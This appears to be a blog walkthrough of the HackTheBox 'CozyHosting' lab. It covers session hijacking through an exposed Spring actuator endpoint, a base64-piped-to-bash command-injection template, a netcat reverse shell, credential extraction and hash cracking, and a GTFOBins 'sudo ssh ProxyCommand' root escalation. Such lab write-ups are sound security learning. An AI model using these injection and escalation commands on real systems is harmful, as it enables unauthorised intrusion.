CozyHosting HTB Walkthrough

Introduction

In this post, You will learn how to CTF the cozyhosting from HTB and have any doubts hope into my discord server and ask the doubts.

Let’s Begin

Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on youtube.

https://www.youtube.com/@techyrick-/videos

Add Target to /etc/hosts

Make sure you add the cozyhosting.htb to /etc/hosts

Scanning

Begin by running the command to verify the Port and Service status as the initial step.

sudo nmap -sC -sV -O -p- cozyhosting.htb

Advertisement

Enumeration

When visiting the web page, it becomes apparent that there are no functions available aside from the Login feature. Therefore, we employ the Directory Fuzzing Tool.

dirsearch -u http://cozyhosting.htb/

We’ve noticed a suspicious directory, specifically /actuator/*. We decided to investigate further by navigating to the suspected path. Upon entering the /actuator/sessions section, we discovered both Unauthorized and kanderson sessions.

Following that, we attempted to manipulate the sessions during the login process, and as a result, we gained access to the Admin web page.

Subsequently, we will encounter a function related to configuring SSH connections.

When we examine Burpsuite, we notice a redirection to another location, specifically within the error message that mentions ‘Connect Time Out’.

If we leave the ‘Param Username’ section empty, we observe an error related to an SSH command, indicating a potential Command Injection vulnerability in this section.

;echo${IFS}"[ PAYLOAD ]"|base64${IFS}-d|bash;

Next, let’s examine Netcat, where we opened a port and waited. You’ll notice that we were able to regain access to the shell.

When we employ the ‘ls’ command to inspect the files, we discover the presence of a .jar file. We proceed to open a port for downloading the .jar file, and then explore its contents to see what’s inside.

python3 -m http.server 8083

Once the download is finished, extract the file, and you will find the Postgres Username and Password.

Afterwards, let’s ensure the stability of the shell connection by stabilizing it. Then, we can check the ‘/etc/passwd’ file to identify the users on the machine.

How to stabilize a simple reverse shell to a fully interactive terminal [Click here] to Read More

And now, we are connecting to Postgres.

psql "postgresql://$DB_USER:$DB_PWD@$DB_SERVER/$DB_NAME"

Upon successfully connecting to Postgres, let’s explore the contents of the database to see what it holds for us.

PostgreSQL: Basic psql Commands [Click here] to Read More

Subsequently, we discover a username and password within the database, and proceed to initiate the cracking process.

After successfully cracking the password, we can now attempt to establish an SSH connection.

Advertisement

john -w /usr/share/wordlists/rockyou.txt hash.txt

We’ve obtained the User flag already

Privilege Escalation

First, let’s inspect the permissions using the following command:

sudo -l

We observe that SSH can be executed with root privileges. Let’s utilize the payload from GTFO BIN.

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

Now, we can proceed to read the Root flag.

Conclusion

This box is recommended for beginners as it offers an enjoyable experience without being too challenging.

Advertisement


Share your love
Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site